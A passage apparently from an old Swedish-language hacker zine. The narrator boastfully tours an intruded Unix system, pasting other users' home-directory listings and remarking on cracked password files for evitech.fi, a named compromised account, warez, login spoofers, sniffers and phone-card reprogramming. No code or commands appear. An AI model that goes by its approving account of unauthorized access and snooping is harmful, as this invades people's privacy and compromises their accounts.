1 candyman nighteam 1 Dec 5 11:24 .login -rw-r--r-- 1 candyman nighteam 25 Dec 1 10:41 .login~ -rw-r--r-- 1 candyman nighteam 0 Nov 6 16:07 .mc.ini -rw-r--r-- 1 candyman nighteam 503 Nov 6 16:07 .mc.tree drwx------ 2 candyman nighteam 1024 Jan 12 12:51 .ncftp -rw------- 1 candyman nighteam 118 Dec 12 12:18 .ncrecent drwx------ 3 candyman nighteam 1024 Dec 20 15:44 .netscape -rw-r--r-- 1 candyman nighteam 2625 Jan 12 14:32 .netscape-bookmarks.html drwx------ 2 candyman nighteam 24576 Jan 12 18:47 .netscape-cache -rw------- 1 candyman nighteam 17401 Jul 25 13:18 .netscape-history -rw-r--r-- 1 candyman nighteam 148361 Jul 24 10:53 .netscape-newsgroups-news -rw-r--r-- 1 candyman nighteam 1686 Jan 12 14:30 .netscape-preferences -rw------- 1 candyman nighteam 0 Jan 10 12:33 .news_time -rw-r--r-- 1 candyman nighteam 13714 Jan 12 13:32 .newsrc -rw-r--r-- 1 candyman nighteam 258392 Nov 20 14:59 .newsrc.8728 drwx------ 2 candyman nighteam 1024 Sep 4 20:38 .nn -rw-r--r-- 1 candyman nighteam 13709 Jan 12 13:21 .oldnewsrc -rw------- 1 candyman nighteam 712 Jan 11 13:24 .pine-interrupted-mail -rw-r--r-- 1 candyman nighteam 5529 Jan 12 15:36 .pinerc -rw-r--r-- 1 candyman nighteam 480 Jan 10 11:48 .plan -rw-r--r-- 1 candyman nighteam 454 Dec 22 09:24 .plan~ -rw-r--r-- 1 candyman nighteam 58 Nov 15 14:55 .project -rw-r--r-- 1 candyman nighteam 58 Nov 8 17:10 .project~ -rw-r--r-- 1 candyman nighteam 17 Sep 4 21:32 .signature -rw-r--r-- 1 candyman nighteam 15 Oct 20 20:05 .slirprc -rw-r--r-- 1 candyman nighteam 23 Oct 20 19:52 .slirprc~ -rw-r--r-- 1 candyman nighteam 63 Jan 12 13:19 .tcshrc -rw-r--r-- 1 candyman nighteam 33 Jan 10 12:43 .tcshrc~ drwxr-xr-x 2 candyman nighteam 1024 Aug 25 13:49 .term drwxr-xr-x 4 candyman nighteam 1024 Jan 12 13:32 .tin -rw-r--r-- 1 candyman nighteam 94 Aug 18 12:35 .xinitrc -rw-r--r-- 1 candyman nighteam 66 Aug 18 12:19 .xinitrc~ -rw-r--r-- 1 candyman nighteam 118372 Dec 19 16:33 Configure.help-1.3 drwxr-xr-x 9 candyman access 1024 Dec 14 14:29 Linux drwx------ 2 candyman nighteam 1024 Nov 24 10:21 Mail drwx------ 2 candyman nighteam 1024 Nov 24 10:21 News drwx------ 3 candyman nighteam 1024 Oct 26 23:05 build drwx------ 22 candyman nighteam 1024 Dec 14 15:44 download drwx------ 5 candyman nighteam 1024 Dec 13 11:26 graphics drwxr-xr-x 2 candyman nighteam 1024 Oct 12 12:33 html -rwxr-xr-x 1 root root 8752 Jan 10 12:14 linuxfin.txt drwx------ 2 candyman nighteam 1024 Jan 12 10:50 mail -rw------- 1 candyman nighteam 1971 Jan 10 16:28 mbox drwx------ 3 candyman nighteam 1024 Dec 13 12:39 netscape drwx------ 2 candyman nighteam 2048 Oct 12 11:23 news drwx------ 2 candyman nighteam 1024 Oct 10 13:10 para-proc drwx------ 2 candyman nighteam 1024 Dec 7 14:54 prosa drwx------ 2 candyman nighteam 1024 Jan 10 11:54 shadow drwx------ 4 candyman nighteam 1024 Oct 12 11:29 source drwxrwx--- 5 candyman access 1024 Jan 12 18:50 teddy drwx------ 2 candyman nighteam 1024 Jan 10 10:47 tmp Well, han hade en hel del skit.. Men i tmp kanske det finns ngt roligt.. Lat oss checka.. /private/candyman/tmp: total 20 drwx------ 2 candyman nighteam 1024 Jan 10 10:47 . drwxr-xr-x 24 candyman nighteam 2048 Jan 12 15:36 .. -rw-r--r-- 1 root root 1470 Dec 15 00:25 aliases -rwx------ 1 candyman nighteam 3617 Aug 8 17:52 evitech.fi -rwx------ 1 candyman nighteam 250 Aug 11 11:44 guessed -rwx------ 1 candyman nighteam 9 Aug 8 17:49 katjahmr -rw-r--r-- 1 root root 5091 Jan 9 14:20 passwd -r-------- 1 root root 3504 Jan 9 14:27 shadow Hehe, joda.. Det skulle jag nog vilja saga.. Tre av filerna har han tydligen satt upp nar han kort med root oxa.. Well, kanske ska beratta vad som dojlde sig bakom nagra av filnamnen oxa.. Aven om de ar ratt sjalv forklarande.. guessed inneholl nagra crackade passwd's till evitech.fi. Det var tydligen crackat med Crack 4.1 kan jag ju oxa saga.. katjahmr inneholl passwordet till usern katjahmr pa evitech.fi.. (Ett annat password till samma konto fanns i guessed, sa de har antagligen bytt password at henne..) Ska well fortsatta, och kika lite pa vad pone kan dolja.. /private/pone: total 5274 -rw-r--r-- 1 pone nighteam 44156 Dec 20 15:32 #sit.fi.sorted# -rwx------ 1 pone nighteam 1399 Dec 4 09:00 %backup%~ drwxr-xr-x 24 pone nighteam 2048 Jan 12 08:45 . drwxrwxr-x 4 root root 1024 Nov 26 20:27 .. -rwx------ 1 pone nighteam 1246 Jan 12 08:41 .addressbook -rw-r--r-- 1 pone nighteam 2573 Jan 12 08:41 .addressbook.lu -rw------- 1 pone nighteam 542 Dec 20 16:45 .article -rwx------ 1 pone nighteam 756 Dec 20 18:51 .cshrc -rwx------ 1 pone nighteam 733 Dec 2 13:51 .cshrc~ -rw-r--r-- 1 pone nighteam 15 Dec 20 13:01 .forward -rwx------ 1 pone nighteam 164 Jul 10 1995 .kermrc -rwx------ 1 pone nighteam 34 Jun 6 1993 .less -rwx------ 1 pone nighteam 114 Nov 24 1993 .lessrc -rw-r--r-- 1 pone nighteam 6 Nov 26 20:42 .logout -rwx------ 1 pone nighteam 25 Aug 14 03:12 .mailcap~ -rw-r--r-- 1 pone nighteam 0 Dec 20 08:53 .mc.ini -rw-r--r-- 1 pone nighteam 70 Dec 20 08:53 .mc.tree -rwx------ 1 pone nighteam 357 Aug 10 06:10 .netscape-bookmarks.html drwxr-xr-x 2 pone nighteam 11264 Nov 24 19:50 .netscape-cache -rwx------ 1 pone nighteam 91 Aug 10 06:10 .netscape-cookies -rwx------ 1 pone nighteam 12923 Aug 14 04:13 .netscape-history -rwx------ 1 pone nighteam 1568 Oct 23 20:22 .netscape-preferences -rwx------ 1 pone nighteam 0 Jan 12 13:46 .news_time -rw-r--r-- 1 pone nighteam 290356 Dec 20 19:39 .newsrc -rw-r--r-- 1 pone nighteam 259272 Oct 15 17:02 .newsrc.20926 -rw-r--r-- 1 pone nighteam 159420 Dec 20 16:47 .oldnewsrc drwxr-xr-x 2 pone nighteam 2048 Oct 29 20:11 .pics -rw-r--r-- 1 pone nighteam 5657 Jan 12 08:45 .pinerc -rw-r--r-- 1 pone nighteam 494 Aug 28 02:48 .plan -rw-r--r-- 1 pone nighteam 12 Aug 28 02:50 .project -rwx------ 1 pone nighteam 414 Dec 20 17:51 .signature -rwx------ 1 pone nighteam 415 Nov 17 12:27 .signature~ drwx------ 2 pone nighteam 1024 Sep 19 09:04 .term drwxr-xr-x 4 pone nighteam 1024 Dec 21 01:36 .tin -rwx------ 1 pone nighteam 89 Aug 7 22:08 .xinitrc -rw-r--r-- 1 pone nighteam 65792 Nov 16 22:44 690v100.img drwx------ 2 pone nighteam 1024 Jul 28 13:02 Mail drwx------ 2 pone nighteam 1024 Jul 28 13:02 News -rw-rw-r-- 1 pone nighteam 15262 Nov 21 14:26 PPP-HOWTO.gz -rw-r--r-- 1 pone nighteam 208339 Nov 21 19:38 alt.2600_FAQ,_Beta_.012_-_Part_1_1 -rw-r--r-- 1 pone nighteam 6133 Nov 21 19:38 alt.2600_Survival_Guide drwxrwxr-x 2 pone nighteam 1024 Nov 16 09:33 arlan dr-x------ 2 pone nighteam 1024 Nov 27 03:25 crontabs -rw-r--r-- 1 pone nighteam 3877 Jan 11 18:14 cute.fi -rw------- 1 pone bin 477 Dec 18 15:37 dead.letter drwxr-xr-x 4 pone nighteam 1024 Nov 24 11:28 docs drwxr-xr-x 4 pone nighteam 1024 Nov 30 20:32 download -rwx------ 1 pone nighteam 216 Nov 6 21:09 falm drwxr-xr-x 3 fear users 1024 Dec 11 16:02 fear -rwx------ 1 pone nighteam 485 Nov 20 18:17 fmasi -rwx------ 1 pone nighteam 485 Nov 20 18:16 fmasi~ -rwx------ 1 pone nighteam 238 Nov 6 21:21 fmm -rwx------ 1 pone nighteam 437 Nov 6 21:41 fpone -rw-r--r-- 1 pone nighteam 2076 Nov 1 20:18 homepage.html -rw-r--r-- 1 pone nighteam 2001 Nov 1 19:57 homepage.html~ drwxr-xr-x 13 pone nighteam 1024 Dec 2 15:31 html -rwx------ 1 pone nighteam 307 Dec 18 16:50 iafmail -rwx------ 1 pone nighteam 312 Dec 18 16:50 iafmail~ -rw-r--r-- 1 pone nighteam 856989 Nov 23 11:49 ingres04.tar.Z -rwx------ 1 pone nighteam 312 Nov 16 20:34 innomail -rwx------ 1 pone nighteam 301 Nov 16 20:33 innomail~ drwxr-xr-x 3 pone nighteam 1024 Jan 12 01:57 log -rw-r--r-- 1 pone nighteam 198 Dec 2 17:38 loggi -rw------- 1 pone nighteam 1535 Nov 29 11:21 loki drwxr-xr-x 2 pone nighteam 12288 Aug 25 13:30 lost+found drwx------ 2 pone nighteam 1024 Jan 12 08:54 mail -rwx------ 1 pone nighteam 588 Dec 2 13:43 masi -rwx------ 1 pone nighteam 586 Nov 27 09:48 masi~ drwxr-xr-x 2 pone nighteam 1024 Dec 2 18:10 matts -rw------- 1 pone nighteam 105106 Nov 28 17:50 mbox drwxr-xr-x 2 root root 1024 Nov 24 11:47 mqueue -rw------- 1 pone nighteam 1562829 Nov 24 20:38 nag.ps -rw------- 1 pone nighteam 1562833 Nov 24 20:37 nag.ps~ drwx------ 2 pone nighteam 1024 Aug 7 01:34 news drwxr-xr-x 7 nordman users 2048 Nov 28 14:55 nordman -rw-r--r-- 1 pone nighteam 1620 Jan 11 18:28 otech.fi drwx------ 2 pone nighteam 1024 Oct 15 16:51 passwd -rwx------ 1 pone nighteam 542 Nov 28 13:09 pone -rwx------ 1 pone nighteam 501 Nov 27 10:05 pone~ -rwx------ 1 pone nighteam 1435 Nov 27 03:05 q~ -rwxr--r-- 1 pone nighteam 1333 Nov 26 21:12 rooter -rwxr--r-- 1 pone nighteam 1333 Nov 26 21:10 rooter~ -rwxr-xr-x 1 pone nighteam 438 Oct 27 18:40 setter -rw-r--r-- 1 pone nighteam 44156 Dec 20 15:23 sit.fi -rw-r--r-- 1 pone nighteam 44156 Dec 20 15:27 sit.fi.sorted -rwx------ 1 pone nighteam 302 Jul 28 12:17 staffmail -rwx------ 1 pone nighteam 301 Nov 15 13:54 studmail -rwx------ 1 pone nighteam 302 Nov 15 13:54 studmail~ lrwxrwxrwx 1 pone nighteam 17 Dec 20 09:19 talk -> /usr/bin/talk.old drwx------ 2 pone nighteam 1024 Jan 12 18:57 temp drwx------ 4 pone nighteam 1024 Oct 15 16:53 texts -rw-r--r-- 1 pone nighteam 811 Dec 19 14:24 trlog Lite diverse passwd-filer fanns ju dar, blandannat.. I .pics fanns det porr.. (Onodigt att slosa utrymme i maget med en listning..) I download/win95/ fanns det en hel del w4r3z.. Hittar overhuvudtaget en hel del w4r3z och porr lite overallt.. Sa jag hoppar direkt vad jag hittar i hacking-vag.. /private/pone/passwd: total 5 drwx------ 2 pone nighteam 1024 Oct 15 16:51 . drwxr-xr-x 24 pone nighteam 2048 Jan 12 08:45 .. -rw------- 1 pone nighteam 376 Oct 15 16:12 ftp.aragorn.uio.no -rw------- 1 pone nighteam 183 Oct 15 16:14 ftp.batnet.com Tja, dar fanns tva passwd-filer.. Som han har varit lam nog att ta via ftp.. Bada var fake passwd's.. Well, over till /private2 da.. /private2: total 22 drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 . drwxr-xr-x 20 root root 1024 Jan 10 11:37 .. drwxrwxr-x 2 ripper TheDudez 1024 Nov 22 11:10 Linux drwxrwx--- 4 paul TheDudez 1024 Jan 9 19:41 Stuff drwxrwx--- 4 paul TheDudez 5120 Jan 9 13:07 Warez drwxrwxr-x 2 kea TheDudez 1024 Dec 15 14:46 algdata -rwxrwx--- 1 kea TheDudez 396 Nov 28 13:25 htmler -rwxr-x--- 1 ripper TheDudez 410 Nov 28 13:16 htmler.old drwxr-xr-x 19 kea TheDudez 2048 Jan 12 18:27 kea drwxr-xr-x 3 paul TheDudez 1024 Nov 28 14:13 library drwxr-xr-x 23 paul TheDudez 2048 Jan 12 12:37 paul drwxr-xr-x 13 ripper TheDudez 1024 Dec 29 01:57 phrack drwxr-xr-x 25 ripper TheDudez 2048 Jan 12 17:09 ripper drwxr-xr-x 2 paul TheDudez 1024 Jan 12 12:57 santtu.dellas.ner.jag.orkar.JUH drwxr-xr-x 10 ted TheDudez 1024 Dec 28 19:06 ted Tja, som ni ser.. Warez igen.. I Stuff fanns bland annat en passwd-fil igen.. I Warez, inte sa ovantat warez... I kea, som verkar vara webadmin, fanns passwd-filer och crackade konton.. I paul fanns en massa porr, en del warez och en del passwd-filer.. Har ar vad som fanns i phrack.. /private2/phrack: total 22 drwxr-xr-x 13 ripper TheDudez 1024 Dec 29 01:57 . drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 .. -rw-r--r-- 1 ripper TheDudez 3072 Feb 14 1995 anarch.zip drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 11:49 aotd drwxr-xr-x 2 ripper TheDudez 2048 Sep 26 11:56 ati drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 11:58 btr drwxr-xr-x 2 ripper TheDudez 4096 Sep 26 12:20 cdc drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:34 dfp drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:35 fbi drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:39 informatik drwxr-xr-x 2 ripper TheDudez 2048 Sep 26 12:52 kaos drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:58 lodcom drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 13:05 lol drwxr-xr-x 2 ripper TheDudez 2048 Sep 26 13:44 misc En hel del hp-zines har de samlat pa sig.. Och i misc, en massa blandade hp-texter och utils.. Har ar ripper's dir.. /private2/ripper: total 1190 drwxr-xr-x 25 ripper TheDudez 2048 Jan 12 17:09 . drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 .. drwxr-xr-x 4 ripper TheDudez 3072 Nov 14 18:25 ..html drwxr-xr-x 2 ripper TheDudez 1024 Sep 6 13:27 .LiCe drwxr-xr-x 2 ripper TheDudez 1024 Sep 7 17:41 .a -rw-r--r-- 1 ripper TheDudez 215 Sep 21 12:39 .addressbook -rw-r--r-- 1 ripper TheDudez 1492 Sep 21 12:39 .addressbook.lu -rw------- 1 ripper TheDudez 541 Dec 29 01:38 .article~ -rw-r--r-- 1 ripper TheDudez 41 Sep 21 19:55 .bash_history -rw-r--r-- 1 ripper TheDudez 846 Nov 21 15:52 .cshrc -rw-r--r-- 1 ripper TheDudez 846 Nov 9 20:50 .cshrc~ drwx------ 2 ripper TheDudez 1024 Jul 26 20:43 .elm -rw-r--r-- 1 ripper TheDudez 41 Jan 11 12:53 .forward -rw-r--r-- 1 ripper TheDudez 19 Jan 11 12:53 .forward_bara_forward -rw-r--r-- 1 root root 41 Jan 9 14:02 .forward_old -rw-r--r-- 1 ripper TheDudez 112 Jul 26 20:04 .ircrc -rw-r--r-- 1 ripper TheDudez 164 Jul 10 1995 .kermrc -rw-r--r-- 1 ripper TheDudez 34 Jun 6 1993 .less -rw-r--r-- 1 ripper TheDudez 114 Nov 24 1993 .lessrc -rw------- 1 ripper TheDudez 859 Jan 10 12:02 .letter~ -rw-r--r-- 1 ripper TheDudez 84 Aug 1 22:23 .login -rw-r--r-- 1 ripper TheDudez 0 Dec 29 01:55 .mc.ini -rw-r--r-- 1 ripper TheDudez 1328 Dec 29 01:55 .mc.tree drwxr-xr-x 2 ripper TheDudez 1024 Dec 27 00:00 .ncftp -rw------- 1 ripper TheDudez 0 Jan 12 17:06 .news_time -rw-r--r-- 1 ripper TheDudez 2292 Jan 12 17:09 .newsrc -rw-r--r-- 1 ripper TheDudez 2292 Jan 12 17:07 .oldnewsrc -rw-r--r-- 1 ripper TheDudez 5488 Jan 12 17:06 .pinerc -rw-r--r-- 1 ripper TheDudez 404 Sep 1 13:58 .plan drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 14:44 .procmail -rw-r--r-- 1 ripper TheDudez 152 Sep 26 14:50 .procmailrc -rw-r--r-- 1 ripper TheDudez 19 Aug 14 20:42 .project -rw-r--r-- 1 ripper TheDudez 408 Jan 12 17:06 .signature -rw-r--r-- 1 ripper TheDudez 465 Nov 9 20:48 .signature.old -rw-r--r-- 1 ripper TheDudez 405 Aug 25 08:04 .signature~ drwx------ 2 ripper TheDudez 1024 Sep 19 08:10 .term -rw------- 1 ripper TheDudez 639 Jul 29 06:07 .tia drwxr-xr-x 4 ripper TheDudez 1024 Jan 12 17:09 .tin drwxr-xr-x 12 ripper TheDudez 2048 Dec 28 21:54 Crack-4.1 -rw-r--r-- 1 ripper TheDudez 14939 Oct 30 07:18 Dip+SLiRP+CSLIP_v1.1 drwx------ 2 ripper TheDudez 1024 Sep 12 14:16 Mail drwxr-xr-x 2 ripper TheDudez 4096 Jan 12 17:09 News drwxr-x--- 2 ripper TheDudez 1024 Oct 31 17:29 bin drwxr-xr-x 3 ripper TheDudez 1024 Sep 19 17:23 cipher -rw-r--r-- 1 ripper TheDudez 770 Jan 9 13:08 crontab -rw-r--r-- 1 ripper TheDudez 812635 Dec 26 23:55 de220e.exe -rw-r--r-- 1 ripper TheDudez 819 Dec 28 21:45 dead.article -rw------- 1 ripper bin 1121 Oct 21 23:16 dead.letter drwxr-xr-x 2 ripper TheDudez 1024 Aug 14 20:56 dev drwxr-xr-x 4 ripper TheDudez 1024 Nov 30 15:32 html drwx------ 2 ripper TheDudez 1024 Jan 12 14:59 mail -rw-r--r-- 1 ripper TheDudez 3003 Sep 26 19:48 mailer drwxrwxr-x 2 ripper TheDudez 1024 Oct 26 15:53 mits drwxr-xr-x 3 ripper TheDudez 1024 Nov 9 17:57 nc drwxr-xr-x 2 ripper TheDudez 1024 Nov 24 21:42 net -rw-r--r-- 1 ripper TheDudez 101455 Sep 19 19:20 net-tools-1.2.0.tar.gz -rw-r--r-- 1 ripper TheDudez 396 Nov 9 20:47 output -rw------- 1 ripper TheDudez 682 Sep 26 14:34 passu -rw-r--r-- 1 ripper TheDudez 45056 Nov 6 11:37 passwd drwxrwxr-x 2 ripper TheDudez 2048 Jan 12 11:01 pics -rw-r--r-- 1 ripper TheDudez 95486 Sep 20 10:21 roots.net drwxr-xr-x 3 ripper TheDudez 1024 Aug 31 19:42 screen -rw-r--r-- 1 ripper TheDudez 8755 Sep 21 19:32 shcrack.c -rw-r--r-- 1 ripper TheDudez 9716 Sep 21 19:37 spoof.c -rw-r--r-- 1 ripper TheDudez 642 Sep 21 19:39 spoof.doc drwxr-xr-x 2 ripper TheDudez 1024 Dec 7 23:46 stuff -rw-r--r-- 1 ripper TheDudez 6155 Sep 28 16:31 sunny.sh -rwx------ 1 ripper TheDudez 2277 Nov 9 20:49 taggit -rw-r--r-- 1 ripper TheDudez 2002 Nov 9 20:33 tags drwxr-xr-x 2 ripper TheDudez 1024 Dec 5 15:19 test -rw-r--r-- 1 ripper TheDudez 21859 Nov 13 11:36 uucp.how Well, en login-spoof, sniffers, passwd-filer, exploits, porr, cracker-prog, crackade passwd-filer, en ratt fin samling dict-filer, krypterings-progs.. Heh, ripper skulle nastan kunna vara en av oss! :) Men.. Kanske inte precis vad man vill ha som sysadm.. I ripper's mail fanns lite ql info oxa.. Detaljerad beskrivning och pascal-src for att gora en smartcard-lasare, koppla in den till sin PC, och med programmet programmera om telefon-kort.. Programmet passade for kort fran Norge, Irland, Czech Republic (!?) och Finland.. Hehe.. Well, det fanns en hel del tvivelaktiga saker pa det har systemet..